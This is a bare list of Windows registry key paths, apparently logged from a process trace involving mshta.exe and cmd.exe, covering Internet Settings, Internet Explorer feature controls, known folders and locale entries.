HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Containers\SecureAutoProxy
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_TOKEN_BINDING
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableHttp2ConnectionSharing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableTlsAnonymousClientAuthFallback
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableProxyAuthenticationSchemes
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableProxyLinkLocalNameResolution
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableInsecureTlsFallback
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableInsecureTlsFallback
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyQueryWithFullUrl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Containers\SendDnsToHost
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableCachingNegativeProxyResults
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableTcpFastOpen
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EdpEnforcementOverride
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\PolicyExtensions\TenantRestrictionsPlugin.dll
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\PolicyExtensions\TenantRestrictionsPlugin.dll\PolicySubPath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\PolicyExtensions\TenantRestrictionsPlugin.dll\DllPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\QuicTestHost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\
HKEY_CURRENT_USER\Software\Classes\PROTOCOLS\Name-Space Handler\
HKEY_LOCAL_MACHINE\Software\Classes\PROTOCOLS\Name-Space Handler
HKEY_CURRENT_USER\Software\Classes\PROTOCOLS\Name-Space Handler
HKEY_CURRENT_USER\Software\Classes\PROTOCOLS\Name-Space Handler\http\
HKEY_LOCAL_MACHINE\Software\Classes\PROTOCOLS\Name-Space Handler\http
HKEY_CURRENT_USER\Software\Classes\PROTOCOLS\Name-Space Handler\*\
HKEY_LOCAL_MACHINE\Software\Classes\PROTOCOLS\Name-Space Handler\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlock
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\PhishingFilter
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\PhishingFilter
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\PhishingFilter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Parental Controls\Users\S-1-5-21-2527171340-3306644326-1278290521-1001
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Pre Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Pre Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
HKEY_LOCAL_MACHINE\Security\Internet Explorer\User Agent
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_URLMON_IQDA_SIZE
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_URLMON_IQDA_SIZE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_WEAK_ENCRYPTION
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_WEAK_ENCRYPTION
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_ENABLE_HTTP2
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_ENABLE_HTTP2
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_ENABLE_HTTP2\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_ENABLE_HTTP2\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download\FeatureEnableIEHostOnlyCookies
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_USE_BUILTIN_ACCEPT_HEADERS
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_USE_BUILTIN_ACCEPT_HEADERS
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttpLowerCaseHost
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableUTF8
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Control Panel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Control Panel
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Control Panel
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\BrowserStorage\AppCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\BrowserStorage\AppCache
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserStorage\AppCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\BrowserStorage\AppCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer\DisableKnownFolders
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParsingName_36354489
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\DefinitionFlags
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2527171340-3306644326-1278290521-1001\ProfileImagePath
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\KnownFolderSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Parental Controls\users\S-1-5-21-2527171340-3306644326-1278290521-1001\Web
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedPC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedPC\EduSharedPCMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\Compatibility\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\OOBE\LaunchUserOOBE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME\mshta.exe
HKEY_CURRENT_USER\Software\Classes\Interface\{00000160-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{00000160-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\Interface\{00000160-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{00000160-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{00000160-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\Extensions\DragDropExtension
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Direct3D\Drivers\Size
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Direct3D\Drivers\Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Direct3D\DX6TextureEnumInclusionList\Size
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Direct3D\DX6TextureEnumInclusionList\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\TransientObjects\%5C%5C.%5CRpc%5CAllowLpacAppExperience%5CInterface\SecurityDescriptor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\SdbUpdates\DirectXApps.sdb
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\SdbUpdates\DisableDoubleQuerySdbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\C:\Windows\SysWOW64\mshta.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\C:\Windows\SysWOW64\cmd.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\LoginUrl
HKEY_LOCAL_MACHINE\Software\Microsoft\IdentityStore\LoadParameters\{B16898C6-A148-4967-9171-64D755DA8520}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityStore\LoadParameters\{B16898C6-A148-4967-9171-64D755DA8520}\LoginUri
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityStore\LoadParameters\{B16898C6-A148-4967-9171-64D755DA8520}\EnterpriseAuthorityUri
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\AAD\Package
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\FontCache\Parameters\ClientCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_D3D_MULTITHREADING
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_D3D_MULTITHREADING
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_D3D_DEBUG_LAYER
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_D3D_DEBUG_LAYER
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseSWRender
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\UseSWRender
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU\AdapterInfo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\ResourcePolicies
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\*
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ca-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ca-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cs-CZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cs-CZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\da-DK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\da-DK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\de-DE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\de-DE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\el-GR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\el-GR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\es-ES_tradnl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\es-ES_tradnl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fi-FI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fi-FI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fr-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fr-FR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\hu-HU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\hu-HU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\nl-NL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\nl-NL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\nb-NO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\nb-NO
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\pl-PL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\pl-PL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\pt-BR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\pt-BR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\ru-RU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\ru-RU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sk-SK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sk-SK
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sv-SE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sv-SE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\tr-TR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\tr-TR
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\sl-SI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\sl-SI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\eu-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\eu-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\es-MX
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\es-MX
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\pt-PT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\pt-PT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\es-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\es-ES
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\fr-CA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\fr-CA

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\000604xx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\MID
